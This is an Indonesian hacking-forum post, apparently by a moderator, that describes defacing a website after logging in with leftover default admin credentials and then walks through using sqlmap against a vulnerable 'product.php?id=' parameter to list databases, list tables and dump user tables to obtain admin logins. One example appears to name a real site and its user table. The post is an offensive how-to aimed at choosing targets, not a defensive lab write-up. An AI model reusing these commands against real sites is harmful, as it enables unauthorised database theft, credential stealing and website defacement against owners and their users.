Mengambil database di web melalui SQL MAP di Kali Linux

Norton [CPS] WW
EnglishFrenchGermanItalianKoreanPortugueseRussianSpanishTurkish

Megatron

Administrator
Staff member
General
Moderator
saat saya sedang mencari-cari target web untuk di deface ga sengaja saya menemukan sebuah web yang pada halaman admin user dan pass nya sudah ada dari sananya dan lalu saya tinggal masuk aja ke halaman admin sesudah masuk ke halaman admin saya langsung masuk ke menu template lalu cari index dan lalu saya ganti codingannya dengan codingan deface saya yang sederhana sesudah itu save dan lihat hasilnya

Pertama Kita cari target web yang ingin di ambil databasenya, Contoh target web saya: http://xxx.xxx/product.php?id=2 . Setelah itu buka terminal lalu ketikan

sqlmap -u target kalian –dbs
contoh: sqlmap -u http://xxx.xxx/product.php?id=2 –dbs
lalu tunggu sampai keluar database, setelah itu pilih database selain information_schema, lalu ketikan :

sqlmap -u target kalian -D database yang dipilih –tables
contoh: sqlmap -u http://mascar.it/product.php?id=2 -D mascar –tables
hasilnnya seperti dibawah

752


setelah keluar table kalian tinggal cari user untuk bisa masuk ke halaman admin dengan cara

sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh — columns
atau bisa langsung kalian dump dengan

sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh –dump
contoh: sqlmap -u http://xxx.xxx/product.php?id=2 -D mascar -T ac_utenti –dump

hasilnya seperti dibawah

753


dan nanti akan keluar user dan passnya lalu tinggal login